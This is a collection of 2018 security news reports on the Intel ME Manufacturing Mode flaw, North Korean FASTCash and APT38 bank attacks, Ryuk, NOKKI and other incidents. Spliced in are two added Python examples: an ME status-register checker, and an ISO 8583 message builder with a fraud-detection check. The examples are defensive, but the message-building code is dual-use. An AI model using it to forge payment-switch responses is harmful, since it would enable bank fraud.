Apple said in a statement it "has never found malicious chips, 'hardware manipulations' or vulnerabilities purposely planted in any server."

A statement by Amazon to AFP said that "at no time, past or present, have we ever found any issues relating to modified hardware or malicious chips in Supermicro motherboards in any Elemental or Amazon systems.‎"

Supermicro could not immediately be reached for comment, but Bloomberg said the firm denied any knowledge of the espionage or investigation.


CVE-2018-4251 – Apple did not disable Intel Manufacturing Mode in its laptops
4.10.2018 securityaffairs
Vulnerebility

Positive Technologies while analyzing Intel Management Engine (ME) discovered that Apple did not disable Intel Manufacturing Mode in its laptops
Experts from security firm Positive Technologies, while analyzing the Intel Management Engine (ME), discovered that Apple had not closed the ME's Manufacturing Mode on its laptops.

The Intel Management Engine is built around a microcontroller that works with the Platform Controller Hub (PCH) chip and its integrated peripherals; it is a critical component that handles data exchanged between the processor and peripherals.

For this reason, security experts warned in the past of the risks for Intel Management Engine vulnerabilities. An attacker can exploit a flaw in the Intel ME to establish a backdoor on the affected system and gain full control over it.

Last year the same group of experts at Positive Technologies discovered an undocumented configuration setting that disabled the Intel Management Engine.

The team also published a proof-of-concept exploit code for a vulnerability in the Intel Management Engine JTAG.

Last year, experts from the Electronic Frontier Foundation asked Intel to provide a way to disable the IME.

In August 2017, the experts from Positive Technologies (Dmitry Sklyarov, Mark Ermolov, and Maxim Goryachy) discovered a way to disable the Intel Management Engine 11 via an undocumented mode.

The researchers discovered that it is possible to turn off the Intel ME by setting the undocumented high assurance platform (HAP) bit to 1 in a configuration file.

The experts found that this mode had been added for the US government's High Assurance Platform program, which is run by the NSA.

This week, researchers Maxim Goryachy and Mark Ermolov published a blog post revealing that Intel's ME contains an undocumented Manufacturing Mode.

“Intel ME Manufacturing Mode is intended for configuration and testing of the end platform during manufacturing, and as such should be disabled (closed) before sale and shipment to users,” states the security duo.

“However, this mode and its potential risks are not described anywhere in Intel’s public documentation.”

The only way to change Manufacturing Mode settings is a utility included in the Intel ME System Tools software, which is not available to the public. The software configures platform settings both in one-time programmable memory called Field Programmable Fuses (FPF), an operation normally performed before shipment, and in the ME's internal file system, MFS (ME File System), on SPI (Serial Peripheral Interface) flash memory, via parameters known as CVARs (Configurable NVARs, Named Variables).

On older systems, prior to Apollo Lake, Intel kept the SPI flash access rights of the Intel Management Engine, Gigabit Ethernet and CPU separate.

On newer systems, the SPI controllers implement the Master Grant feature, which can override the access rights declared in the SPI descriptor.

"What this means is that even if the SPI descriptor forbids host access to an SPI region of ME, it is possible for ME to still provide access," the researchers explain.

The experts warned that a device on which the maker has not closed Manufacturing Mode is open to attack by a local attacker.

Ironically, one of Intel's major customers, Apple, left Manufacturing Mode enabled on its laptops; the issue is tracked as CVE-2018-4251.

Apple addressed the problem in June 2018 with the macOS High Sierra 10.13.5 update.

The researchers published a Python script on GitHub that lets users check whether Manufacturing Mode is enabled on their own systems.
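One way to perform that check, as an added example that is not the Positive Technologies tool: the ME exposes its state in the HFSTS1 status register, and the "Manufacturing Mode" flag is bit 4 of that register (the bit layout below follows the public HFSTS1 decoders such as coreboot's intelmetool; the field names are theirs). The two input paths, the Linux `/sys/class/mei/mei0/fw_status` file, which prints FWSTS1..6 as one 8-hex-digit word per line, and the HFSTS1 dword at config offset 0x40 of the MEI PCI device as shown by `lspci -s 00:16.0 -xxx`, are assumptions about the host; the sample contents are constructed.

```python
"""Decode the Intel ME HFSTS1 register to tell whether Manufacturing Mode
is enabled. Added illustration, not the Positive Technologies script.
Bit layout per public HFSTS1 decoders (coreboot intelmetool); the sysfs and
lspci reading paths are assumptions, the sample dumps are constructed."""
import re

# Constructed /sys/class/mei/mei0/fw_status contents: FWSTS1..FWSTS6, one word per line.
SAMPLE_SYSFS = """94000255
00000000
00000000
00000000
00000000
00000000
"""

# Constructed 'lspci -s 00:16.0 -xxx' output: HFSTS1 dword (little-endian) at offset 0x40.
SAMPLE_LSPCI = """00:16.0 Communication controller: Intel Corporation (sample)
00: 86 80 a1 9d 06 00 10 00 21 00 80 07 00 00 00 00
40: 55 02 00 94 00 00 00 00 00 00 00 00 00 00 00 00
"""


def parse_sysfs_fw_status(text):
    """Return the FWSTS register values listed in the sysfs fw_status file."""
    words = [int(tok, 16) for tok in text.split() if re.fullmatch(r"[0-9A-Fa-f]{8}", tok)]
    if not words:
        raise ValueError("no FWSTS words found")
    return words


def parse_lspci_hexdump(text, offset=0x40):
    """Extract a little-endian 32-bit dword at `offset` from an 'lspci -xxx' dump."""
    cfg = {}
    for line in text.splitlines():
        m = re.match(r"^([0-9a-f]{2}): ((?:[0-9a-f]{2} ?)+)$", line.strip(), re.I)
        if not m:
            continue                       # device description line, not a hex row
        base = int(m.group(1), 16)
        for i, byte in enumerate(m.group(2).split()):
            cfg[base + i] = int(byte, 16)
    try:
        return int.from_bytes(bytes(cfg[offset + i] for i in range(4)), "little")
    except KeyError:
        raise ValueError(f"offset {offset:#x} not present in dump") from None


def decode_hfsts1(value):
    """Split HFSTS1 into its documented fields (subset)."""
    return {
        "working_state": value & 0xF,          # 5 = normal operation
        "mfg_mode": bool((value >> 4) & 1),    # Manufacturing Mode still open
        "fpt_bad": bool((value >> 5) & 1),
        "operation_state": (value >> 6) & 0x7,
        "fw_init_complete": bool((value >> 9) & 1),
        "error_code": (value >> 12) & 0xF,
        "operation_mode": (value >> 16) & 0xF,
    }


def manufacturing_mode_enabled(hfsts1):
    return decode_hfsts1(hfsts1)["mfg_mode"]


def check_host(sysfs_path="/sys/class/mei/mei0/fw_status"):
    """Read HFSTS1 from the live sysfs file (Linux, mei driver loaded)."""
    with open(sysfs_path) as fh:
        return manufacturing_mode_enabled(parse_sysfs_fw_status(fh.read())[0])


if __name__ == "__main__":
    hfsts1 = parse_sysfs_fw_status(SAMPLE_SYSFS)[0]
    print(f"HFSTS1={hfsts1:#010x} mfg_mode={manufacturing_mode_enabled(hfsts1)}")
    print(f"lspci path agrees: {parse_lspci_hexdump(SAMPLE_LSPCI) == hfsts1}")
```

Reading the register tells you whether the mode is open on the running firmware; it says nothing about the fuse state, so a "closed" result does not prove the FPFs were burned, only that the ME currently reports itself out of Manufacturing Mode.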

“Our research shows that Intel ME has a Manufacturing Mode problem, and that even giant manufacturers such as Apple are not immune to configuration mistakes on Intel platforms. Worse still, there is no public information on the topic, leaving end users in the dark about weaknesses that could result in data theft, persistent irremovable rootkits, and even “bricking” of hardware.” conclude the experts.
“We also suspect that the ability to reset ME without resetting the main CPU may lead to yet additional security issues, due to the states of the BIOS/UEFI and ME falling out of sync.”


Hidden Cobra APT used the new ATM cash-out scheme FASTCash to hit banks worldwide
4.10.2018 securityaffairs
APT

A joint technical alert from the DHS, the FBI, and the Treasury warning about a new ATM cash-out scheme, dubbed “FASTCash,” used by Hidden Cobra APT.
The US-CERT has released a joint technical alert from the DHS, the FBI, and the Treasury warning about a new ATM cash-out scheme, dubbed “FASTCash,” being used by the prolific North Korean APT hacking group known as Hidden Cobra (aka Lazarus Group and Guardians of Peace).

The activity of the Lazarus Group surged in 2014 and 2015; its members used mostly custom-tailored malware in their attacks, and the experts who investigated the crew consider it highly sophisticated.

This threat actor has been active since at least 2009, possibly as early as 2007, and it was involved in both cyber espionage campaigns and sabotage activities aimed to destroy data and disrupt systems.

The group is considered responsible for the massive WannaCry ransomware attack, a string of SWIFT attacks in 2016, and the Sony Pictures hack.

According to the report published by the US-CERT, Hidden Cobra has been using the FASTCash technique since at least 2016; the APT group targets bank infrastructure to cash out ATMs.

Government experts analyzed 10 malware samples involved in FASTCash attacks; the state-sponsored hackers used them to compromise payment "switch application servers" within the targeted banks in order to facilitate fraudulent transactions.

“FASTCash schemes remotely compromise payment switch application servers within banks to facilitate fraudulent transactions. The U.S. Government assesses that HIDDEN COBRA actors will continue to use FASTCash tactics to target retail payment systems vulnerable to remote exploitation.” states the report.

“According to a trusted partner’s estimation, HIDDEN COBRA actors have stolen tens of millions of dollars. In one incident in 2017, HIDDEN COBRA actors enabled cash to be simultaneously withdrawn from ATMs located in over 30 different countries. In another incident in 2018, HIDDEN COBRA actors enabled cash to be simultaneously withdrawn from ATMs in 23 different countries.”

A switch application server communicates with the core banking system to validate a customer's account details for a requested transaction.

HIDDEN COBRA attackers deployed scripts on the compromised switch application servers that intercept financial request messages and reply with fraudulent but legitimate-looking affirmative response messages.

Experts noticed that all of the compromised switch application servers were running unsupported IBM Advanced Interactive eXecutive (AIX) operating system versions.

The initial infection vector is still unknown; there is, however, no evidence that the attackers exploited the AIX operating system itself in these incidents.

“HIDDEN COBRA actors exploited the targeted systems by using their knowledge of International Standards Organization (ISO) 8583—the standard for financial transaction messaging—and other tactics.” continues the report.

“HIDDEN COBRA actors most likely deployed ISO 8583 libraries on the targeted switch application servers. Malicious threat actors use these libraries to help interpret financial request messages and properly construct fraudulent financial response messages.”


Most accounts used to initiate the transactions had minimal activity or zero balances.
The FASTCash cash-out scheme was used to target banks in Africa and Asia, while U.S. authorities are still investigating incidents in the country that may be linked to this technique.
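The two paragraphs above describe the core of the scheme: the switch answers ISO 8583 authorisation requests (MTI 0200) with approved responses (MTI 0210, DE39 = "00") that the core banking system never backed, for accounts that held little or nothing. The following added example, which is not the US-CERT tooling, shows a minimal ISO 8583 encoder/decoder for a handful of data elements and a reconciliation check that flags approvals the ledger could not have funded; the field subset, message samples and ledger are constructed.

```python
"""Minimal ISO 8583 encode/decode plus a reconciliation check that flags
approved responses the core ledger could not have funded, the FASTCash
pattern. Added illustration, not US-CERT tooling; the element subset,
sample messages and ledger below are constructed."""

# Subset of ISO 8583 data elements, primary bitmap only (bits 2..64).
# kind: "fixed" = fixed-length field, "llvar" = 2-digit length prefix.
FIELD_SPEC = {
    2: ("llvar", 19),   # DE2  primary account number (PAN)
    3: ("fixed", 6),    # DE3  processing code (01xxxx = cash withdrawal)
    4: ("fixed", 12),   # DE4  transaction amount, minor units
    11: ("fixed", 6),   # DE11 system trace audit number (STAN)
    39: ("fixed", 2),   # DE39 response code ("00" = approved)
}


def encode(mti, fields):
    """Build MTI + 16-hex-char primary bitmap + concatenated data elements."""
    bits, body = 0, ""
    for de in sorted(fields):
        kind, maxlen = FIELD_SPEC[de]
        value = str(fields[de])
        if kind == "llvar":
            if len(value) > maxlen:
                raise ValueError(f"DE{de} too long")
            body += f"{len(value):02d}{value}"
        else:
            if len(value) != maxlen:
                raise ValueError(f"DE{de} must be {maxlen} chars")
            body += value
        bits |= 1 << (64 - de)           # bit 1 is the most significant bit
    return f"{mti}{bits:016X}{body}"


def decode(msg):
    """Parse a message produced by encode(); returns (mti, {de: value})."""
    mti, bitmap, rest = msg[:4], msg[4:20], msg[20:]
    bits = int(bitmap, 16)
    if bits >> 63:                       # bit 1 set = secondary bitmap follows
        raise ValueError("secondary bitmap not supported in this example")
    fields, pos = {}, 0
    for de in range(2, 65):
        if not (bits >> (64 - de)) & 1:
            continue
        if de not in FIELD_SPEC:
            raise ValueError(f"DE{de} present but not in FIELD_SPEC")
        kind, maxlen = FIELD_SPEC[de]
        if kind == "llvar":
            length = int(rest[pos:pos + 2]); pos += 2
            if length > maxlen:
                raise ValueError(f"DE{de} length {length} exceeds {maxlen}")
            fields[de] = rest[pos:pos + length]; pos += length
        else:
            fields[de] = rest[pos:pos + maxlen]; pos += maxlen
    if pos != len(rest):
        raise ValueError("trailing data after last element")
    return mti, fields


def suspicious_approvals(exchanges, ledger):
    """exchanges: (request, response) pairs seen at the switch.
    ledger: {PAN: available balance in minor units} from the core system.
    Returns the STANs of 'approved' responses the core could not have funded,
    or whose STAN does not match the request they answer."""
    flagged = []
    for req_msg, rsp_msg in exchanges:
        req_mti, req = decode(req_msg)
        rsp_mti, rsp = decode(rsp_msg)
        if req_mti != "0200" or rsp_mti != "0210":
            continue                     # only authorisation request/response pairs
        if rsp.get(39) != "00":
            continue                     # declined: nothing was paid out
        if rsp.get(11) != req.get(11):
            flagged.append(req[11]); continue   # response does not belong to this request
        if ledger.get(req[2], 0) < int(req[4]):
            flagged.append(req[11])      # approved, but the account could not cover it
    return flagged


# Constructed data: one genuine withdrawal and one FASTCash-style approval
# against a zero-balance account.
LEDGER = {"4111111111111111": 250_000, "5500000000000004": 0}


def sample_exchanges():
    good = {2: "4111111111111111", 3: "011000", 4: "000000010000", 11: "000101"}
    bad = {2: "5500000000000004", 3: "011000", 4: "000000500000", 11: "000102"}
    return [
        (encode("0200", good), encode("0210", {**good, 39: "00"})),
        (encode("0200", bad), encode("0210", {**bad, 39: "00"})),
    ]


if __name__ == "__main__":
    print(suspicious_approvals(sample_exchanges(), LEDGER))
```

Running this kind of reconciliation against the core ledger, rather than trusting the switch's own logs, is what catches the scheme: the forged responses are well-formed ISO 8583 and look identical to genuine approvals on the wire, so the only tell is that the core system never saw or could not have funded the transaction.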

Experts believe the attackers gained their initial foothold through spear-phishing emails against bank employees, with the malicious messages carrying Windows executables.

The malicious code was used for lateral movements aimed at deploying malware onto the payment switch application server.

US-CERT provided mitigation recommendations for institutions operating retail payment systems, including two-factor authentication for any access to the switch application server.

Further details, including IoCs, are reported in the alert.


APT38 is behind financially motivated attacks carried out by North Korea
4.10.2018 securityaffairs
APT

Security experts from FireEye published a report on the activity of financially motivated threat actors, tracked as APT38, linked to the North Korean government.
The attacks targeted financial institutions; FireEye estimates that APT38 has attempted to steal at least a hundred million dollars from banks worldwide.

APT38 appears to be a North Korea-linked group separate from the infamous Lazarus group, it has been active since at least 2014 and it has been observed targeting over 16 organizations across 11 countries.


The report attributes to APT38 the string of attacks against the SWIFT banking system, including the hack of Vietnam's TP Bank in 2015, Bangladesh's central bank in 2016, Taiwan's Far Eastern International Bank in 2017, Bancomext in Mexico in 2018, and Banco de Chile in 2018.

"APT38 is a financially motivated group linked to North Korean cyber espionage operators, renowned for attempting to steal hundreds of millions of dollars from financial institutions and their brazen use of destructive malware." reads the report published by FireEye.

“Attribution to both the “Lazarus” group and TEMP.Hermit was made with varying levels of confidence primarily based on similarities in malware being leveraged in identified operations. Over time these malware similarities diverged, as did targeting, intended outcomes, and TTPs, almost certainly indicating that TEMP.Hermit activity is made up of multiple operational groups primarily linked together with shared malware development resources and North Korean state sponsorship.”

According to FireEye, APT38 targets banks worldwide to supply the North Korean government with cash that bypasses the sanctions imposed on Pyongyang by foreign states.

“Based on observed activity, we judge that APT38’s primary mission is targeting financial institutions and manipulating inter-bank financial systems to raise large sums of money for the North Korean regime. Increasingly heavy and pointed international sanctions have been levied on North Korea following the regime’s continued weapons development and testing.” continues the report.

“The pace of APT38 activity probably reflects increasingly desperate efforts to steal funds to pursue state interests, despite growing economic pressure on Pyongyang.”

Experts believe the activity of the group will continue in the future, likely adopting new sophisticated tactics to avoid detection.

“Based on the large scale of resources and vast network dedicated to compromising targets and stealing funds over the last few years, we believe APT38’s operations will continue in the future,” concludes FireEye.

“In particular, the number of SWIFT heists that have been ultimately thwarted in recent years coupled with growing awareness for security around the financial messaging system could drive APT38 to employ new tactics to obtain funds especially if North Korea’s access to currency continues to deteriorate.”


US offers its cyber warfare defense capabilities to NATO
4.10.2018 securityaffairs
BigBrothers

The United States will offer its offensive cyber capabilities to NATO to strengthen the alliance's defenses against threat actors such as Russian ones.

The announcement is expected today at a meeting of defence ministers in Brussels; the decision follows public commitments by Britain and Denmark to provide cyber resources to NATO.

According to NATO chief Jens Stoltenberg, cyber attacks against members of the alliance are increasing in frequency and complexity, for this reason, it is essential to approach them with joint effort and mutual collaboration.

Attackers are able to interfere with the political processes of the countries, it has already happened during the 2016 Presidential election, and threaten critical infrastructure worldwide.

Cyber attacks on NATO countries were becoming "more frequent... more sophisticated... more coercive", Stoltenberg said, and any contribution of cyber capabilities was welcome.

“We see cyber being used to meddle in domestic political processes, attacks against critical infrastructure, and cyber will be an integral part of any future military conflict,” Stoltenberg said.

The critical infrastructure of Lithuania, Latvia and Estonia is under constant attack, which those countries attribute to Russia.

Russia-linked APT groups are blamed for interference in several European elections and in the 2018 US midterm elections.

US intelligence has accused the Kremlin of conducting a social media disinformation campaign in Macedonia aimed at sabotaging the referendum on changing the country's name, a change that could open the door to NATO membership for the country.


Canadian restaurant chain Recipe suffered a network outage, is it a ransomware attack?
4.10.2018 securityaffairs
Ransomware

The Canadian restaurant chain Recipe Unlimited, which operates nearly 1,400 restaurants under 19 brands in Canada, suffered a major IT outage over the weekend in what it calls a "malware outbreak."

Recipe Unlimited has suffered a major malware-based attack that impacted several of its brands.

On Monday the company confirmed that malware was the root cause of a partial network outage at nine of its brands, including Swiss Chalet, Harvey's, East Side Mario's, and Kelseys.

Recipe discovered the malware outbreak on September 28 and immediately started its incident response procedure. A number of systems were taken offline, and the affected locations were cut off from the Internet.

The affected locations continued to process card transactions manually.

The infections have caused the closure of a “small number” of restaurants for a “temporary period of time.”

“A limited number of Recipe Unlimited restaurants are currently experiencing a partial network outage. Only certain restaurants under the Swiss Chalet, Harvey’s, Milestones, Kelseys, Montana’s, Bier Markt, East Side Mario’s, The Landing Group of Restaurants and Prime Pubs brands have been impacted.” reads a statement published by the company.

“We learned of the malware outbreak on Friday, September 28 and immediately initiated steps to prevent any further spread and take appropriate precautionary measures. As a result, we have taken a number of our systems offline and suspended internet access to affected locations as a precaution. This caused some of our restaurants to experience some service delay related issues, including being unable to process credit and debit card transactions. However, all of those restaurants are able to manually process credit card charges. A smaller number of affected restaurants have decided to close for a temporary period of time to avoid inconvenience to guests due to service issues.”

According to CBC News, Recipe was the victim of a ransomware attack; the broadcaster also published a copy of a ransom note provided by a worker at one of the affected restaurants.

“All of our computer systems crashed,” said a worker on shift at the time at an affected location. “The ransom note appeared under the file, ‘read me‘ in a WordPad format. We were all really in a state of shock.”

The hackers claim that they encrypted the files using "the strongest military algorithms"; at the time there is no information on the amount of bitcoin demanded from the victims.

The amount requested by the crooks will increase with the time.

“The final price depends on how fast you write to us,” warns the ransom note. “Every day of delay will cost you additional +0.5 BTC.”

Recipe Unlimited disputes the ransomware characterization, saying it maintains regular system backups that let it recover promptly from this kind of attack.

“We maintain appropriate system and data security measures,” said spokesperson Maureen Hart in an email.


According to Hart, the ransom note published online is a “generic” statement associated with a virus called Ryuk, and other copies of the note can be found via a Google search.

The ransom note is associated with the Ryuk ransomware, a threat documented by security experts at Check Point in August. At the time, Check Point attributed the Ryuk campaign, which targeted organizations around the world, to a North Korea-linked threat actor.

The campaign appeared targeted and well planned: the crooks went after several enterprises and encrypted hundreds of PCs, storage systems and data centers in each infected company.


California Law Sets Up Fresh Legal Clash Over 'Net Neutrality'
4.10.2018 securityweek
BigBrothers

The US Justice Department's lawsuit to block a California law aimed at ensuring that all online traffic is treated equally sets up a legal clash over so-called "net neutrality" and the authority to regulate the internet.

California Governor Jerry Brown on Sunday signed the law that re-established net neutrality in his state, the country's largest and home to some of the largest online firms including Facebook and Google.

Within hours, the Trump administration sued to block the law, calling it an illegal infringement over federal authority.

"Under the constitution, states do not regulate interstate commerce -- the federal government does. Once again the California legislature has enacted an extreme and illegal state law attempting to frustrate federal policy," Attorney General Jeff Sessions said in a statement announcing the lawsuit.

The moves open up a new legal clash over net neutrality rules, which have been the subject of a contentious battle for over a decade.

Net neutrality backers argue that a law is needed to guard against broadband providers such as Verizon and AT&T favoring their own services and blocking or slowing rival services such as Netflix.

"This law will prevent internet service providers from unduly influencing internet traffic, thereby allowing Californians to continue to decide what content they want and when they want it, and allowing the online market to continue to flourish," said Eric Null of the New America Foundation's Open Technology Institute.

But critics claim restrictions will chill investment needed to ensure that new high-speed networks are built and innovative services offered.

Federal Communications Commission chairman Ajit Pai countered that the California law "hurts consumers" and infringes on federal authority.

"The law prohibits many free-data plans, which allow consumers to stream video, music, and the like exempt from any data limits," Pai said.

"The internet is free and open today, and it will continue to be under the light-touch protections" of current federal rules.

Long, winding road

The FCC adopted net neutrality rules twice starting in 2009, in both cases struck down by the courts which said the agency had no authority to regulate internet firms. A third effort in 2015 withstood a court challenge when the FCC reclassified broadband firms as telecom providers.

But last year, under Trump appointee Pai, the FCC reversed course and repealed net neutrality rules, which prompted several states to begin their own efforts.

Stanford University law professor Barbara van Schewick said she believes the California law will withstand the federal challenge and set a standard that will be followed in the US and around the world.

Van Schewick said in a blog post that while an FCC 2017 order explicitly bans states from adopting their own net neutrality laws, "that preemption is invalid."

"An agency that has no power to regulate has no power to preempt the states, according to case law," she said.

The law also marks the latest challenge between Brown's administration and President Donald Trump's Republicans, who have already clashed over environmental and immigration regulations.

USTelecom, which represents companies in the broadband sector, said it supports net neutrality but disagreed with the California law.

"Rather than 50 states stepping in with their own conflicting open internet solutions, we need Congress to step up with a national framework for the whole internet ecosystem and resolve this issue once and for all," the industry group said.


Tanium Raises $200 Million at $6.5 Billion Valuation
4.10.2018 securityweek
IT

Emeryville, CA-based endpoint security and systems management firm Tanium announced on Tuesday that it has raised an additional $200 million through the sale of common stock, which raises the company’s pre-money valuation to $6.5 billion.

The funding round was led by Wellington Management along with Baillie Gifford & Company and Adage Capital Management, and brings the total amount raised by the company to nearly $800 million.

Founded in 2007, Tanium has been a hot candidate for an initial public offering (IPO), but appears to have put that idea on the back burner, noting that some of the funding “may be used to provide early investor and employee liquidity.”

When asked if an IPO was on the horizon, Fazal Merchant, COO and CFO at Tanium, told SecurityWeek, “An IPO needs to be a natural evolution of the business. Typical reasons, such as the need for liquidity, aren’t relevant to Tanium at the moment. So, we’re going to maintain focus on the three things that will help ensure our success continues: customers, product, and our people.”

The company said it had approximately $320 million in cash and equivalents as of Jan. 31, 2018, and positive operating cash flow of $25 million.

It also said that its Annual Recurring Revenue of approximately $230 million was up over 80% from the prior year.

Tanium offers a platform that collects and processes billions of metrics across endpoints in real time, which lets enterprises quickly identify changes in the state of endpoints and helps IT do everything from pinpointing and fixing operational issues to fending off cyberattacks.

In April 2017, the company came under fire when it was accused of exposing a California hospital’s network in sales demos without client permission.


Foxit Reader Update Patches Over 100 Vulnerabilities
4.10.2018 securityweek
Vulnerability

The newly released Foxit Reader 9.3 brings along patches for over 100 security flaws, including some that could result in remote code execution.

Developed by California-based Foxit Software, the Foxit Reader is a multilingual freemium tool that allows users to create, view, edit, digitally sign, and print Portable Document Format (PDF) files. According to the company, the reader has hundreds of millions of users.

The latest version of the reader, Foxit reveals in an advisory, brings patches for a broad range of vulnerabilities, including out-of-bounds, use-after-free, information disclosure, type confusion, and memory corruption bugs, the most severe of which could result in remote code execution.

The vulnerabilities, Foxit says, could be exploited when parsing strings, when executing certain JavaScript, due to the use of objects which have been deleted or closed, when handling certain properties of annotation objects, or when opening or processing malicious PDF documents.

18 of the vulnerabilities were disclosed by security researchers with Cisco Talos, all of which could be exploited for either remote or arbitrary code execution. The bugs impact the JavaScript engine of the Reader and can be exploited with the help of a specially crafted, malicious PDF either open in the application itself or in a browser, if the browser plugin is enabled.

Most of the remaining security vulnerabilities addressed with this update were discovered by security researchers working with Trend Micro's Zero Day Initiative.

The bugs are said to impact version 9.2.0.9297 and earlier of Foxit Reader and Foxit PhantomPDF and have been addressed with the release of Foxit Reader 9.3 and Foxit PhantomPDF 9.3.

The security updates arrived only days before Adobe released tens of patches for its own PDF tools. On Monday, the company announced the availability of Acrobat DC and Acrobat Reader DC (Continuous) 2019.008.20071, Acrobat 2017 and Reader DC 2017 (Classic 2017) 2017.011.30105, and Acrobat DC and Reader DC (Classic 2015) 2015.006.30456, which address a total of 86 vulnerabilities.


Researchers Link New NOKKI Malware to North Korean Actor
4.10.2018 securityweek
Virus

A recently observed variant of the KONNI malware appears tied to a remote access Trojan (RAT) previously attributed to a North Korean actor, Palo Alto Networks security researchers say.

Dubbed NOKKI, the new malware family shows close resemblance and code overlaps with KONNI, a piece of malware long used in attacks targeting the Korean peninsula, and is likely the work of the same developer. The threat has been in use since at least January 2018 and shows ties to the threat group known as Reaper, Palo Alto Networks reveals in a recent post.

NOKKI, the security researchers discovered, was designed to collect a broad range of information from the infected machine (including IP address, hostname, username, drive information, operating system information, and details on the installed programs), can drop additional malware onto the system, and can also execute decoy documents.

Starting in January, the researchers observed several attacks involving NOKKI, targeting entities in Cambodia and Russia with documents featuring content related to local political matters.

In a report published this week, Palo Alto Networks reveals that NOKKI is related to the DOGCALL malware family, a backdoor previously attributed to the Reaper group and likely in use by this group only. The actor is known for targeting the military and defense industry within South Korea, as well as a Middle Eastern organization doing business with North Korea.

By analyzing malicious macros within Microsoft Word documents designed to drop NOKKI, the researchers discovered that the employed deobfuscation technique was also used in documents targeting individuals interested in the World Cup hosted in Russia in 2018 with the DOGCALL malware.

While the NOKKI dropper samples would fetch both a payload and a decoy document, the World Cup malware sample would download and execute a remote VBScript file wrapped in HTML, while also appending text to the original Word document to provide the lure for the victim.

The VBScript file leverages the same unique deobfuscation routine, and fetches and executes a dropper called Final1stspy, which in turn downloads a payload belonging to the DOGCALL malware family.

When installed on a compromised machine, the threat can take screenshots, log keys, capture microphone data, collect victim information, collect files of interest, and download and execute additional payloads.

Communication with the command and control (C&C) is performed via third-party hosting services such as Dropbox, pCloud, Yandex Cloud, and Box.

“What originally began as research surrounding a new malware family named NOKKI that had code overlap and other ties to KONNI led us to an interesting discovery tying the NOKKI malware family to the Reaper threat actor group. Additionally, we discovered yet another malware family that has not been previously publicly reported that we have named Final1stspy,” Palo Alto Networks concludes.


Facebook Says No Apps Were Accessed in Recent Hack
4.10.2018 securityweek
Social

Facebook has shared another update on the hacker attack disclosed last week. The social media giant says there is no evidence that the attackers accessed any third-party apps.

Facebook revealed on September 28 that it had reset the access tokens for 90 million accounts, including 50 million that were directly impacted and 40 million deemed at risk.

Hackers obtained access tokens for nearly 50 million accounts after exploiting three distinct bugs in the View As feature, which shows users how others see their profile, and a video uploader interface introduced in July 2017. The vulnerability was patched and Facebook informed users in its initial blog post that it had found no evidence of misuse, but noted that its investigation is ongoing.

The company admitted that the attackers could have accessed not only Facebook accounts with the compromised tokens, but also third-party apps that use Facebook login. Resetting the tokens eliminated the risk of unauthorized access to these applications, but Facebook still had to figure out if any apps were accessed during the attack.

A blog post published by the company on Tuesday said there was no evidence of unauthorized access to apps based on an analysis of logs for all third-party apps installed or logged in during the attack.

Facebook has also created a tool to help developers determine if any of their users have been impacted.

“Any developer using our official Facebook SDKs — and all those that have regularly checked the validity of their users’ access tokens – were automatically protected when we reset people’s access tokens,” explained Guy Rosen, VP of Product Management at Facebook. “However, out of an abundance of caution, as some developers may not use our SDKs — or regularly check whether Facebook access tokens are valid — we’re building a tool to enable developers to manually identify the users of their apps who may have been affected, so that they can log them out.”

Facebook has advised developers to use its official SDKs for Android, iOS and JavaScript as these automatically check the validity of access tokens, and log their users out of the app when error codes show an invalid session.

Facebook has yet to provide any information on the attackers and their motives, and the attack does not appear to be targeted at a specific country or region.

The social media giant faces lawsuits and government investigations as a result of the incident, and the company’s stock has been steadily falling since the disclosure of the breach. It dropped from nearly $169 on September 27 to just over $159 on Tuesday.


Apple Chief Says Firm Guards Data Privacy in China
4.10.2018 securityweek
Apple

Apple chief executive Tim Cook on Tuesday said the company is devoted to protecting people's privacy, with data encrypted and locked away on servers even in China.

Cook called privacy one of the most important issues of this century, and maintained that the US-based technology colossus safeguards even the data Chinese law requires it to keep stored in that country.

"We worked with a Chinese company to provide iCloud," Cook said during an interview with Vice News, referring to Apple's service for storing digital content in the internet cloud.

"But, the keys to the data are ours."

Cook said Apple hosts data on servers in an array of countries, but it is not easy for local authorities to get access. China is known for tight internet controls, prompting worries about the privacy of data stored there by Apple.

When asked about a recent security breach revealed by Facebook, Cook once again championed the importance of protecting people's information in a time when smartphones can reveal so much about them.

Cook has repeatedly stressed that Apple's business model does not involve gathering user data and targeting them with ads, the way internet giants Facebook and Google make money.

"You are not our product," Cook said.

"We don't create a profile and allow other companies to target you. That is not the business we are in."

Apple, valued at more than a trillion dollars based on its share price, makes most of its money from iPhone sales. The Silicon Valley company has been working to ramp up revenue from digital content and online services, such as streaming music and data storage.

Cook said that while he is a fan of the free market, he supports the idea of legislation aimed at protecting people's privacy.

"I think there is a need to work with Congress and the staff to make sure we do our jobs of helping them come up to speed on what's possible," Cook said.

"Technology itself doesn't want to be good. It doesn't want to be bad. It doesn't want to be anything. It is up to the creator."


U.S. Links North Korean Government to ATM Hacks
4.10.2018 securityweek
BigBrothers

U.S. Shares Details on North Korea’s ATM Cash-out Scheme

The United States Department of Homeland Security (DHS), Department of the Treasury (Treasury), and Federal Bureau of Investigation (FBI) this week released a joint technical alert to share information on an Automated Teller Machine (ATM) cash-out scheme attributed to the North Korean government.

The financially-motivated malicious campaign was attributed to the North Korea-linked threat actor the U.S. government refers to as Hidden Cobra, but which is better known in the infosec community as the Lazarus Group.

Considered the most serious threat to banks, the actor is believed to have orchestrated the $81 million heist from the Bangladesh bank. This year, the group was said to have been involved in numerous attacks against financial institutions and banks and to have also shown interest in crypto-currencies.

Last year, the U.S. started sharing details on the activity associated with Hidden Cobra, including information on the tools the actor employs in attacks, such as the Typeframe, Joanap, Brambul and Fallchill malware, among others. In September, U.S. authorities charged a North Korean national over his alleged involvement with Lazarus.

The most recent alert issued by the U.S. government on Hidden Cobra details FASTCash, a set of tactics the group has been using since at least 2016 to target banks in Africa and Asia and maintain presence on the victims’ networks for further exploitation.

As part of the FASTCash schemes, hackers remotely compromise payment switch application servers within banks to perform fraudulent transactions. The use of these tactics was highly successful and the group is expected to continue using them to target retail payment systems vulnerable to remote exploitation.

“According to a trusted partner’s estimation, HIDDEN COBRA actors have stolen tens of millions of dollars. In one incident in 2017, HIDDEN COBRA actors enabled cash to be simultaneously withdrawn from ATMs located in over 30 different countries. In another incident in 2018, HIDDEN COBRA actors enabled cash to be simultaneously withdrawn from ATMs in 23 different countries,” the joint alert reads.

The actor allegedly configured and deployed legitimate scripts on compromised servers to intercept legitimate financial requests and reply to them with fraudulent responses. The group leveraged knowledge of the standard for financial transaction messaging and other tactics to exploit the targeted systems.

